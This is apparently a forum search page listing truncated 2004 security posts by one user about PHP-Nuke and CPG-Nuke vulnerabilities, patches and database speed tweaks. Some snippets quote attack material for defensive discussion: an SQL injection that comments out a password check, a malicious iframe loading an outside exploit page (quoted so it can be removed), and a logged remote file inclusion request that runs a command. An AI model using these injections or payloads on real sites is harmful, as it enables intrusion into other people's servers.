Nuke Cops :: Search

Search found 19 matches
Author Message
Topic: This new security hole...
alexm

Replies: 50
Views: 39066

Forum: Nuke Security   Posted: Mon Jun 07, 2004 4:57 am   Subject: This new security hole...
I've seen something similar inside CPG-Nuke about 5 weeks ago.
if (!defined('CPG_NUKE')) {
die ("You can't access this file directly...");
}

Insid ...
Topic: This new security hole...
alexm

Replies: 50
Views: 39066

Forum: Nuke Security   Posted: Fri Jun 04, 2004 3:45 pm   Subject: Re: This new security hole...

Is the fix listed the best one to use?

I'm not an expert on this subject, but the best fix is to make sure that safe_mode is "On" in your PHP. This will disable other users' ability to include() ...
Topic: Is this a Major Hole?
alexm

Replies: 1
Views: 1985

Forum: Nuke Security   Posted: Sun May 02, 2004 5:16 pm   Subject: Re: Is this a Major Hole?
The sql statement would look like this:
SELECT userdetails FROM userlist WHERE uid='booboo'; -- AND pwd='';
Actually, it would probably look a bit more like:
SELECT userdetails FROM userlist WHERE ...
Topic: Base64 File Level Patch by Chatserv
alexm

Replies: 2
Views: 2712

Forum: Nuke Security   Posted: Sat May 01, 2004 5:22 am   Subject: Re: Base64 File Level Patch by Chatserv

$admin = addslashes($admin);
$admin = base64_decode($admin);


Would someone mind telling me why slashing a base64 encoded string is useful? Is there a bug in the PHP base64 decoding bein ...
Topic: GET RID OF UNION HACKS 100%
alexm

Replies: 21
Views: 17047

Forum: Nuke Security   Posted: Fri Apr 23, 2004 10:35 am   Subject: GET RID OF UNION HACKS 100%
Since this UNION is passed in base64 encoding, how is a simple expression evaluation going to matter here?

Because he's catching the "union" as it's passed to the underlying database layer. It's a ...
Topic: Website Infected by Virus - Hacked ?
alexm

Replies: 3
Views: 3750

Forum: Nuke Security   Posted: Wed Apr 21, 2004 10:23 am   Subject: Re: Website Infected by Virus - Hacked ?
For starters, remove this code from your footers (check footer.php and footer lines in the Preferences admin panel).
<iframe src="http://www.turkcode.com/exploit.htm" width="-1& ...
Topic: Web Links: security fix
alexm

Replies: 18
Views: 10149

Forum: Nuke Security   Posted: Fri Apr 02, 2004 1:23 pm   Subject: Re: Web Links: security fix
Why not just put it before the switch($l_op) { and be done with it?

It looks like it's just checking to make sure there are no fancy html entities or the word "union" in the $orderby. Did I miss s ...
Topic: New critical admin vulnerability in all Nukes
alexm

Replies: 7
Views: 7036

Forum: Nuke Security   Posted: Mon Mar 29, 2004 12:14 pm   Subject: Re: New critical admin vulnerability in all Nukes

function deleteNotice($id, $table, $op_back) {
global $db;
$id = intval($id);
$db->sql_query("DELETE FROM ".$prefix."_reviews_add WHERE id = ...
Topic: Forums are getting slower and slower everyday.
alexm

Replies: 16
Views: 23433

Forum: Speed Freaks   Posted: Fri Mar 12, 2004 6:33 am   Subject: Re: Forums are getting slower and slower everyday.
People are getting very pissed off, I remember reading a few posts by Paul (ZX) about speeding up forum's speed, but can't seem to find them.
Any idea, guys?


I think [url=http://www.nukecops.com/ar ...
Topic: phpnuke != secure
alexm

Replies: 9
Views: 5797

Forum: Nuke Security   Posted: Thu Feb 26, 2004 9:20 am   Subject: Re: phpnuke != secure

200.161.186.169 - - [25/Feb/2004:20:17:53 -0500] "GET /index.php?link=http://www.simol.com.br/cmd.txt?&cmd=id HTTP/1.1" 200 44425 "http://www.xeronet.org/i ...
Topic: Minor (major?) speed tweaking with table indexes...
alexm

Replies: 2
Views: 4351

Forum: Speed Freaks   Posted: Wed Feb 25, 2004 3:44 pm   Subject: Re: Minor (major?) speed tweaking with table indexes...
Actually there are loads more and I'm editing the "News" module at the moment.

Just breezing through the mainfile.php and doing a quick spot-check, there's plenty of room for improvement in this are ...
Topic: Minor (major?) speed tweaking with table indexes...
alexm

Replies: 2
Views: 4351

Forum: Speed Freaks   Posted: Wed Feb 25, 2004 8:34 am   Subject: Minor (major?) speed tweaking with table indexes...
I think there's room for some more minor (maybe major?) speed increases in the database table setups. For example:

block-Forums.php from cpgnuke distro:

SELECT t.forum_id, topic_id, topic_title ...
Topic: Heads up!! -Nuke Scripting and SQL Injection issue - 2/10/04
alexm

Replies: 14
Views: 9225

Forum: Nuke Security   Posted: Tue Feb 10, 2004 6:05 pm   Subject: Re: Heads up!! -Nuke Scripting and SQL Injection issue - 2/1

1) Which file do I add the code change to


As was already mentioned, this is mainfile.php.


2) Is this an issue for Nuke 6.7? running with mySql 3.23.56


I'd imagine the exploit is the ...
Topic: Heads up!! -Nuke Scripting and SQL Injection issue - 2/10/04
alexm

Replies: 14
Views: 9225

Forum: Nuke Security   Posted: Tue Feb 10, 2004 3:22 pm   Subject: Re: Heads up!! -Nuke Scripting and SQL Injection issue - 2/1

Any idea if a fix is coming soon? Or does anyone know the fix and can paste the code here?


These will stop the sql injection...

Quick Fix #1: Disable broadcast messages on Admin Panel -> P ...
Topic: Hacked and have the SQL insertion available
alexm

Replies: 26
Views: 23681

Forum: Nuke Security   Posted: Wed Feb 04, 2004 6:23 am   Subject: Re: Hacked and have the SQL insertion available
Thank you djmaze,
Funny thing is I'd only just changed my password the previous day and the code works on a different (later) version of PHPNuke where my username and password are completely differen ...